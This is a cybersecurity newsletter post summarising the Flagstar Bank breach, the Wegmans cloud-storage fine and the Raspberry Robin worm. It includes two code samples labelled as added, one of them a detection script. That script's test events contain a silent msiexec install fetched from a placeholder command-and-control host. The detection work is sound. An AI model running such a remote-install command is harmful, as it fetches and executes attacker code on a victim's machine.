Cyber Intelligence Weekly

Cyber Intelligence Weekly (July 3, 2022): Our Take on Three Things You Need to Know

Welcome to our weekly post where I will be sharing some of the major developments on the future of cybersecurity that you need to know about. Make sure to follow my LinkedIn page as well as Echelon’s LinkedIn page to receive updates on the future of cybersecurity!

You can also subscribe to receive Cyber Intelligence Weekly in your inbox each week.

Before we get started on this week’s CIW, I’d like to share an announcement that we made earlier this week. We are so thrilled to announce that we’ve added Tom Garrubba as our Director of Third-Party Risk Management Services at Echelon. Third-party risk is such an important area of focus, especially in today’s business climate. Ensuring that our clients are adequately handling these risks is one of our top priorities. If you'd like to chat with Tom about your third-party risk program, feel free to reach out or connect with him here: https://www.linkedin.com/in/tomgarrubba/

Away we go!

1. Flagstar Bank Breach Affects over 1.5 Million Customers

Troy, Michigan-based Flagstar Bank recently reported a data breach that affected over 1.5 million of its customers and exposed sensitive data such as their Social Security numbers. This comes a year and a half after Flagstar was involved in a data breach related to the Accellion file sharing application breach.

Per the customer notification letter, Flagstar noted, “After an extensive forensic investigation and manual document review, we discovered on June 2, 2022 that certain impacted files containing your personal information were accessed and/or acquired from our network between December 3, 2021 and December 4, 2021.”

Flagstar did not offer an explanation of why the data breach took so long to uncover. Detection gaps like this are one of the main reasons incident response and mandatory breach reporting are so difficult to manage. Breaches like this often go undetected for weeks or, in this case, months.

2. Attorney General James Secures $400,000 From Wegmans After Data Breach Exposed Consumers’ Personal Information

Wegmans, the New York-based supermarket chain, was recently in the news after being hit with a $400,000 fine from Letitia James, the New York State Attorney General. Per the NYAG, Wegmans left cloud containers open to the internet for years, exposing the sensitive data of many of its customers. Per the release, the exposed data included usernames and passwords for Wegmans accounts, as well as customers’ names, email addresses, mailing addresses, and additional data derived from drivers’ license numbers.

The security holes were discovered by a security researcher who found the misconfigured Microsoft Azure containers open to the public. The misconfigured storage contained a database backup file with over three million customer records. Per the filing, the containers were open from their creation in January 2018 through April 2021.

Unfortunately, these types of cloud misconfiguration errors are far too common. The 2022 Verizon Data Breach report noted 715 incidents of this variety, with 708 containing confirmed data disclosure. Most of the time, these issues stem from infrastructure being stood up in the cloud without ensuring proper access controls are in place. There is also a shortage of cloud security engineers who are qualified to ensure that these environments are secured properly. As with any new technology, we are nowhere near a critical mass of acceptable security knowledge in the marketplace yet. While many of the major cloud providers have been taking steps to make default configurations more secure than they were in the past, this has not slowed down the frequency of these types of issues.
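To make the access-control point concrete, here is an added example (not part of the original post or the NYAG filing) of a small audit over a storage inventory. The inventory is constructed, all account and container names are made up, and the field names `allowBlobPublicAccess` and `publicAccess` follow Azure's storage account and container properties.

```python
# Constructed inventory; every account and container name is hypothetical.
INVENTORY = [
    {"account": "examplebackups01", "allowBlobPublicAccess": True,
     "containers": [
         {"name": "db-backups", "publicAccess": "container"},
         {"name": "web-assets", "publicAccess": "blob"},
         {"name": "internal", "publicAccess": None},
     ]},
    {"account": "examplelocked02", "allowBlobPublicAccess": False,
     "containers": [
         {"name": "legacy-export", "publicAccess": "container"},
     ]},
]


def audit_public_access(inventory):
    """Return (account, container, severity) for every non-private container."""
    findings = []
    for acct in inventory:
        # Assumption: a missing account-level flag is treated as permissive,
        # so the container is still reported.
        account_allows = acct.get("allowBlobPublicAccess") is not False
        for c in acct.get("containers", []):
            level = (c.get("publicAccess") or "none").lower()
            if level == "none":
                continue  # private container, nothing to report
            if not account_allows:
                # Account setting overrides the container: not exposed today,
                # but it becomes public if the account flag is ever flipped.
                severity = "latent"
            elif level == "container":
                severity = "critical"  # anonymous listing and reading
            else:
                severity = "high"      # anonymous read of known blob URLs
            findings.append((acct["account"], c["name"], severity))
    return findings


if __name__ == "__main__":
    for account, container, severity in audit_public_access(INVENTORY):
        print(f"{severity:8} {account}/{container}")
```

Running a check like this on a schedule, rather than once at deployment, is what catches a container that has quietly been public for years.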

The Wegmans case was brought under New York State Law Section 899-BB, which sets out guidelines for data security protections. New York has some of the most stringent data security stipulations for all businesses, as well as specific stipulations for financial services organizations through its tough 23 NYCRR 500. Other states with stringent data security laws include Massachusetts with Bill H.4806, New Jersey with P.L.2005, c.226 (S. 51) and Maryland with House Bill 1154. We only see these increasing over time, with other states across the country following.

3. Microsoft Finds Raspberry Robin Worm in Hundreds of Windows Networks

A new report from Bleeping Computer details a recently discovered Windows worm that has been found on the networks of hundreds of organizations across a variety of industries. This story comes on the heels of a Red Canary report from May of this year.

(Picture: https://redcanary.com/blog/raspberry-robin/)

Red Canary first observed this worm back in September of 2021, and they noted that it is often installed via a USB drive. The worm uses msiexec.exe (Windows Installer) to infect the host by calling out to a malicious command and control (C2) domain. Windows Installer is a software component and API of Microsoft Windows, regularly used for the installation, maintenance, and removal of software.

As in most cases that we see today, legitimate operating system tools are being used to carry out malicious activity in various ways. That is why it is so important to layer defenses and to have a next-generation endpoint protection suite (e.g., CrowdStrike) that analyzes the behavior of these legitimate processes.
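As an added illustration of that kind of behavioral check (example code, not from the original post, Red Canary, or any vendor product), the sketch below flags process-creation events where msiexec.exe is launched with a remote URL. The events, the tuple layout, the hostnames, and the approved-host list are all constructed assumptions.

```python
import ntpath
import re

# Assumption: hosts your software-deployment tooling legitimately installs from.
APPROVED_HOSTS = {"deploy.corp.example"}
URL_RE = re.compile(r"https?://([^\s/:\"']+)", re.IGNORECASE)
QUIET_RE = re.compile(r"(?<!\S)[/-]q\w*", re.IGNORECASE)  # /q, /qn, /quiet ...

# Constructed process-creation events: (host, image, parent image, command line).
# The layout is an assumption; map it to whatever your EDR or Sysmon export uses.
EVENTS = [
    ("ws-014", r"C:\Windows\System32\msiexec.exe", r"C:\Windows\System32\cmd.exe",
     r"msiexec /q /i http://c2.example.invalid:8080/abc"),
    ("ws-022", r"C:\Windows\System32\msiexec.exe", r"C:\Windows\System32\services.exe",
     r"C:\Windows\System32\msiexec.exe /V"),
    ("ws-031", r"C:\Windows\System32\msiexec.exe", r"C:\Windows\explorer.exe",
     r'msiexec.exe /i "C:\Users\a\Downloads\setup.msi"'),
    ("ws-040", r"C:\Windows\SysWOW64\MSIEXEC.EXE", r"C:\Windows\System32\cmd.exe",
     r"MSIEXEC.EXE /I HTTPS://PKG.EXAMPLE.INVALID/X"),
    ("ws-050", r"C:\Windows\System32\msiexec.exe", r"C:\Windows\CCM\CcmExec.exe",
     r"msiexec /i https://deploy.corp.example/agent.msi /qn"),
]


def find_remote_msiexec(events, approved=APPROVED_HOSTS):
    """Return alerts for msiexec.exe started with a URL to a non-approved host."""
    alerts = []
    for host, image, parent, cmdline in events:
        if ntpath.basename(image).lower() != "msiexec.exe":
            continue
        remote = sorted({h.lower() for h in URL_RE.findall(cmdline)} - approved)
        if not remote:
            continue  # local package, service start, or approved deployment host
        alerts.append({
            "host": host,
            "remote": remote,
            "quiet": bool(QUIET_RE.search(cmdline)),  # no UI shown to the user
            "parent": ntpath.basename(parent).lower(),
        })
    return alerts


if __name__ == "__main__":
    for alert in find_remote_msiexec(EVENTS):
        print(alert)
```

Tuning the approved-host list to your own deployment servers keeps the alert volume low enough that each hit gets looked at.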

Thanks for reading!

About us: Echelon is a full-service cybersecurity consultancy that offers holistic cybersecurity program building through vCISO or more specific solutions like penetration testing, red teaming, security engineering, cybersecurity compliance, and much more! Learn more about Echelon here: https://echeloncyber.com/about
